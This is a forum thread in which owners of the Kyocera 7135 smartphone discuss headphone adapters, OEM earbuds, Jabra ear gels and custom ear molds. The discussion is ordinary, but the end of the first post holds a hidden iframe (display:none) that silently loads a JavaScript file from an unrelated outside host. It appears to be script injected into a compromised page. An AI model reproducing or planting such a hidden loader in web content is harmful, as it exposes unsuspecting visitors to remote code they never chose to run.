+ Reply to Thread
Page 1 of 2 1 2 LastLast

[Non-CoolCat] Stereo headphone adapter bad idea . . .

Found a Radio Shack Stereo Headphone adapter in my office drawer today from a past project.
    Thought I just found the perfect solution for my desire to use some of my quality stereo headphones I have around the house from other devices like my MP3 player. I searched 3 Radio Shacks for this adapter and none had one in stock.
    *CAUTION*
    Not only did the adapter tend to keep working it's way back out of the hole ever so slightly . . . been there, done that :0). . . as soon as I plugged it in to the MP3 player the demo song got choppy and stopped.
    Fiddled around a little more and the 7135 froze. I saw on another thread a picture of a $3.99 Radio Shack adapter which was similar to the one I had in my drawer. I would not buy it!
    The bottom line is this . . You are better off buying the $20 adapter from CoolCat or wait until Kyocera offers an adapter. At least you know those choices won't damage your phone. I think the Radio Shack Adapters will damage the 7135 and void your warranty from my experience of today.
    A few days ago I bought the $13.99 OEM Kyocera earbuds from Dan's Cellphones along with other access. and plan to use gel caps over the buds until other alternatives come out.
    For $500 it's just not worth frying your new 7135 that we all waited so long for by Mickey Mousing around with the phones jack.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Those adaptors from RS will not work, as you found out.

My father imports cellular accesories from China and I had him give me a bunch of different earbuds. (They cost about $0.25 to make). The standard 2.5mm 3 ring earbuds work fine. The ones with the 4 ring plugs cased my phone to freeze. Unplugging it un-froze the phone.

I ended up cutting off the 4 ring plug and soldering a standard 3.5mm stereo plug from Radio Shack (http://www.radioshack.com/product.as...5Fid=274%2D274 ) onto it, thus making an adapter identical to the one CoolCat sells. I actually made two, one with a mic and one without. Now I can listen to MP3's with my good headphones. Kinda makes me regret spending the $13 to buy the original Kyo stereo headset from Dan, but oh well.

Thanks to aka.bugle for the pinouts which he posted here a while back: http://www.smartphonesource.com/vbul...5&pagenumber=2

Cost me about $4 in parts, but I can see why CoolCat charges $20-25 for making these. Those wires are small! Took me about an hour to make both adaptors.

Originally posted by dazedone2000
    ...Kinda makes me regret spending the $13 to buy the original Kyo stereo headset from Dan, but oh well.
    You regret spending $13?!?

I wasted 3 times that ($39) on the earbuds from Kyo's accessories website (back before we had Dan here) and I have never even used them once because they don't stay in my ears!
    ~'kito
    pdaPhoneHome Moderator

Re: Stereo headphone adapter bad idea . . .

Originally posted by Expidia
    A few days ago I bought the $13.99 OEM Kyocera earbuds from Dan's Cellphones along with other access. and plan to use gel caps over the buds until other alternatives come out.
    What are these gelcaps, how can I get some, and how much do they cost? Since my Kyo earbuds won't stay in my ears.
    ~'kito
    pdaPhoneHome Moderator

Ear Gels by Jabra.com

Hi Markito
    I said gel caps but they are called ear gels. Jabra makes them. I read about them at the thread below. My wife bought a Jabra headset for her cellphone and it came with 3 sets of ear gels in 3 colors and 3 sizes. From what the thread said they should fit over they Kyo buds.
    I read the thread and remembered that the unused sets have been sitting on a counter in a small package for the last 6 months.
    The blue ones fit very nicely in my ear and actually stay there which ear buds never did.
    I'm sure they are sold on there own for cheap!
    My Kyo's should arrive today from Dan's so I'll let you know how well they work with the gels.
    Go to Jabra.com and the flashing ad on the home page will come up with a close up shot of the ear gels.
    Read the thread at:http://www.smartphonesource.com/vbul...light=ear+buds

Yes, the Jabra ear jels do fit over the ear buds of the standard, OEM Kyocera stereo set ... so long as you remove the foam padding from them first. I'm using the ear jels on mine, and they stay in much better.
    Michael

Re: Re: Stereo headphone adapter bad idea . . .

Originally posted by Markito
    What are these gelcaps, how can I get some, and how much do they cost? Since my Kyo earbuds won't stay in my ears.
    Kito...Coolcat's stereo headphone adaptor was the answer for me. Throughout my life, I have been very uncomfortable putting anything into my ears. I can't use any kind of earbuds. With Coolcat's adaptor, I can use any off-the-shelf headphones. I have a very comfortable pair of Koss headphones that are now working perfectly for listening to the MP3 player on my 7135...thanks to Coolcat!
    Dave

Originally posted by Michael Rye
    Yes, the Jabra ear jels do fit over the ear buds of the standard, OEM Kyocera stereo set ... so long as you remove the foam padding from them first. I'm using the ear jels on mine, and they stay in much better.
    I tried the ear gels. While they helped keep the earbud in my ear, I thought they muffled the sound too much when playing MP3s. I went with CoolCat's adapter which allows the use of any headhpones.

PHO
    Broward County Florida, "Home of the Hanging Chad"
    If your looking for real comfort. It may be a little pricey for most, but the cost for regular consumers is around 50 bucks. YOu can get a custom ear molded piece for your ear that fits with jabra and some other models.

I represent audiologists, so they saw my jabra and were like, hey, we have to make you one. Its pretty comfortable.

Your local audiologists (hearing doctors) can take a mold of your ear and send it to a company like this one

http://www.westone.com/earmold_styles.html

and you can use it to replace your jabra gell thingy.
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

"Aaron the Research Dept."

I think Jabra ear gels are not designed for high-fi sound, just for regular conversation.

Originally posted by KLiuLess
    I think Jabra ear gels are not designed for high-fi sound, just for regular conversation.
    This is true but the main thing is that the eargels (with respect to high-fi) are not a match for the speaker on regular earbuds. The eytmotics, for example, have a transducer that is the diameter of a pencil lead. These would work much better with custom ear molds and, assumably, Jabra eargels.
    -Quick

Re: Re: Re: Stereo headphone adapter bad idea . . .

Originally posted by dwdod
    Kito...Coolcat's stereo headphone adaptor was the answer for me. Throughout my life, I have been very uncomfortable putting anything into my ears. I can't use any kind of earbuds. With Coolcat's adaptor, I can use any off-the-shelf headphones. I have a very comfortable pair of Koss headphones that are now working perfectly for listening to the MP3 player on my 7135...thanks to Coolcat!
    I'm with you there dwdod. I actually own 2 of CoolCat's adaptors and they work excellently. But since I wasted $39+ on the Kyo earbuds and they won't ever work in my ears, I was hoping for something to make them useful.
    ~'kito
    pdaPhoneHome Moderator

Guys, thanks for the info on the Jabra and custom made gels.
    ~'kito
    pdaPhoneHome Moderator

Re: [Non-CoolCat] Stereo headphone adapter bad idea . . .

Can't lose with OEM...

Are anyone's OEM Kyo's . . .

Just received my Stereo Earbuds but the right cord to the earbud is 1 foot longer then the left one which has the switch inline.
    Is this the way yours came?
    What would be the point of making one side longer then the left.

Re: Are anyone's OEM Kyo's . . .

Originally posted by Expidia
    Just received my Stereo Earbuds but the right cord to the earbud is 1 foot longer then the left one which has the switch inline.
    Is this the way yours came?
    What would be the point of making one side longer then the left.
    Keeps the mic near your mouth instead of on your chest.
    "Why all the pearls, why the blue hair, why anything!?"

the right side is longer so that you can wrap it around the back of your neck when not in use.

Originally posted by davemayo
    the right side is longer so that you can wrap it around the back of your neck when not in use.
    Ummm, you're supposed to wrap it around the back of your neck *all* the time. When not in use you can easily let it hang on your right chest and it won't tug on the one in your left ear. I have a couple of this style of ear buds and they are much easier to use than the "normal" ones.
    -Quick

Don't buy those explanations . . .

Mike being close to your mouth on one side OK but the other side is a foot longer . . .

Throw over your shoulder . . . Not!

They s*ck anyway . . . The only ears "ear buds" will fit and stay in are probably my DOG'S EARS. Tried some Jabra ear gels and they s*ck too!

Anyway . . . Just sprung for the $20 right angle adapter from Cool Cat. Now I can use some of my old stereo headphones from other devices I have and not walk around looking like I'm a deaf guy.

Can't believe some of you had to pay $39.95 for these useless ear buds. Got mine at Dan's for 13.99. . . . still not worth it.

Maybe one side was made longer so I could wrap it around the designer's neck and choke him with them. Now I'd pay $39.99 to do that with them. :anger

Another solution is the one I chose - have Coolcat make you a custom headset. No adapter necessary. I use Koss over-the-ear headbandless pads. Very light and portable. If I want even higher fidelity I use Coolcat's right-angle adapter with high end headphones. (I also use that same adapter to run the 7135 through my car stereo.)

Just so I don't sound like a shill for Coolcat, I will say that I was not happy with his original straight-in adapter. It didn't fit well and kept working its way out of the 7135. But I can certainly recommend both the right-angle adapter and his custom headsets.